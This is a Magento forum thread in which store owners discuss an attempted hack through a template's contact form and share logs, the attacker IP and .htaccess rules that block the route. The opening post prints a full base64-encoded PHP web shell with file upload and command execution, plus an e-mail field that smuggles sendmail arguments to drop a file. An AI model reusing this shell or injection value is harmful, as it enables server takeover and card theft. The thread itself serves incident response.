cancel
Showing results for 
Search instead for 
Did you mean: 

Our website has been hacked with eval(base64_decode

SOLVED

Our website has been hacked with eval(base64_decode

Today i got an e-mail from my own magento store with the folowing message

 

Naam: Wendy Rosenberg
E-mail: "Wendy\" -oQ/tmp/ -Xskin/test.php "@aol.com
Telefoon: 9549463828

<?php eval(base64_decode('JHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYgKCEkc2FmZW0wZGUpIHskc2VjdXJpdHk9ICJPRkYiO30NCmVsc2UgeyRzZWN1cml0eT0gIk9OIjt9DQplY2hvICcNCjx0aXRsZT5jY2ZyZXNoIHNpbXBsZSBzaGVsbDwvdGl0bGU+DQo8aDM+PGEgaHJlZj0iaHR0cDovL2NjZnJlc2gubWwvIiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOm5vbmU7IiB0YXJnZXQ9Il9ibGFuayI+PGZvbnQgY29sb3I9ImJsdWUiPmNjZnJlc2gubWw8L2ZvbnQ+PC9hPjwvaDM+DQo8cD48Yj5SZWFkeSBTdG9jazwvYj48L2JyPg0KfCBDQyBGcmVzaCB8IE1haWxlciB8IExlYWRzIHwgc0hlbGwgfCBjUGFuZWwgfCBTU0ggfCBSRFAgfDwvcD4NCjxiPlNBRkVfTU9ERSA6ICcuJHNlY3VyaXR5Lic8L2I+PC9icj4NCjxiPlVuYW1lIDogJy5waHBfdW5hbWUoKS4nPC9iPjwvYnI+DQo8Yj51aWQ9ICcuZ2V0bXl1aWQoKS4nICgnLmdldF9jdXJyZW50X3VzZXIoKS4nKSBnaWQ9Jy5nZXRteWdpZCgpLic8L2I+PC9icj4NCjxiPmN3ZCA6ICcuZ2V0Y3dkKCkuJzwvYj48L2JyPg0KJzsNCj8+DQo8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iPD9waHAgZWNobyAkX1NFUlZFUlsnUEhQX1NFTEYnXTs/PiI+DQo8dGFibGU+DQo8dHI+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJnbyIgc2l6ZT0iMzUiPjwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDb21tYW5kIiBzdHlsZT0id2lkdGg6IDc1cHg7IGhlaWdodDogMjBweDsiPjwvdGQ+PC90cj4NCjwvZm9ybT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8P3BocCBlY2hvICRfU0VSVkVSWydQSFBfU0VMRiddOz8+Ij4NCjx0cj48dGQ+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9Im15RmlsZSI+PC90ZD48dGQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ib2siIHZhbHVlPSJVcGxvYWQiIHN0eWxlPSJ3aWR0aDogNzVweDsgaGVpZ2h0OiAyMHB4OyI+PC90ZD48L3RyPg0KPC90YWJsZT4NCjwvZm9ybT4NCjw/cGhwDQppZiAoaXNzZXQoJF9QT1NUWydvayddKSAmJiBpc3NldCgkX0ZJTEVTWydteUZpbGUnXSkpIHsNCiRmaWxlID0gJF9GSUxFU1snbXlGaWxlJ11bJ3RtcF9uYW1lJ107DQokbmFtZSA9ICRfRklMRVNbJ215RmlsZSddWyduYW1lJ107DQppZiAoIW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZSwgJG5hbWUpKSB7DQplY2hvICc8Yj48Zm9udCBjb2xvcj0icmVkIj5VbmFibGUgdG8gdXBsb2FkIGZpbGU8L2ZvbnQ+PC9iPic7DQp9IGVsc2Ugew0KZWNobyAnU3VjY2VzcyBVcGxvYWRlZCBGaWxlIDxiPjxmb250IGNvbG9yPSJncmVlbiI+Jy4kbmFtZS4nPC9mb250PjwvYj4nOw0KfQ0KfQ0KaWYgKGlzc2V0KCRfUE9TVFsnZ28nXSkpIHsNCmVjaG8gIjxwcmU+IjsNCnN5c3RlbSgkX1BPU1RbJ2dvJ10pOw0KZWNobyAiPC9wcmU+IjsNCmV4aXQ7DQp9'));?>

 

when i executed this php code, i got this webpage

rusult of the php eval/base64_decodeWhat can i do to remove this hack ??

My magento version is 1.9.3.1 

 

 

1 ACCEPTED SOLUTION

Accepted Solutions

Re: Our website has been hacked with eval(base64_decode

We've got the same here.
After some analysis of our log files we recognized that the attacker went the code throught a contact form wich i didnt know that it exists.
Its made of our Template "Passion" by Magesolution.com.
Its seems like the attacker tried to get some code in there over that form.
As a first step we blocked the /contacst/ and /contacts/index/ via .htaccess

RewriteCond %{REQUEST_URI} ^/contacts/index/?
RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]
RewriteCond %{REQUEST_URI} ^/contacts/?
RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]

As i looked up my Log i didnt found any Files been placed. The request of a test.php results a 404 Error for him.
The attacker IP was: 148.251.173.52

View solution in original post

9 REPLIES 9

Re: Our website has been hacked with eval(base64_decode

before this hack i have set the return-path to no, 2 weeks ago

 

In my access log i find this:

148.251.173.52 - - [22/Jan/2017:12:22:25 +0100] "POST /contacts/index/post HTTP/1.1" 302 758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"
148.251.173.52 - - [22/Jan/2017:12:22:27 +0100] "GET /skin/test.php HTTP/1.1" 404 1295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"

 

But i cant find the test.php in the skin folder

Re: Our website has been hacked with eval(base64_decode

Hello, I have the same problem since today, i had also put "the retrun path" to NO. Have you got news about this ?

Re: Our website has been hacked with eval(base64_decode

Not yet,

But have you received a e-mail with the same content ?

Re: Our website has been hacked with eval(base64_decode

Yes exactly the same at 2 times, and i turned off " Retrun-path" to "no" last week

Re: Our website has been hacked with eval(base64_decode

I am still looking what kind of hack this is.

What i have done is create a .php file with only the content of that php script

<?php eval(base64_decode(.....));?>

open that file in a webbrowser an you will see a web page with a link to ccfresh.ml

 

You can also paste this content on a form in this website http://ddecode.com/phpdecoder/

It has to do with creditcards info as you wil see.

 

Can you inform me when you solved this hack ?

 

Re: Our website has been hacked with eval(base64_decode

I hope it's not a hack but an attempt to hack. I am unfortunately not educated enough to solve this problem.

 

Re: Our website has been hacked with eval(base64_decode

If i find something about it, i will give the information

Re: Our website has been hacked with eval(base64_decode

We've got the same here.
After some analysis of our log files we recognized that the attacker went the code throught a contact form wich i didnt know that it exists.
Its made of our Template "Passion" by Magesolution.com.
Its seems like the attacker tried to get some code in there over that form.
As a first step we blocked the /contacst/ and /contacts/index/ via .htaccess

RewriteCond %{REQUEST_URI} ^/contacts/index/?
RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]
RewriteCond %{REQUEST_URI} ^/contacts/?
RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]

As i looked up my Log i didnt found any Files been placed. The request of a test.php results a 404 Error for him.
The attacker IP was: 148.251.173.52

Re: Our website has been hacked with eval(base64_decode

Grueff2  Thanks for solving this problem, and the rewrite rules

I didnt know the existence of that mailform to

My attacker has the same IP adres, and comes from Germany

https://www.maxmind.com/en/geoip-demo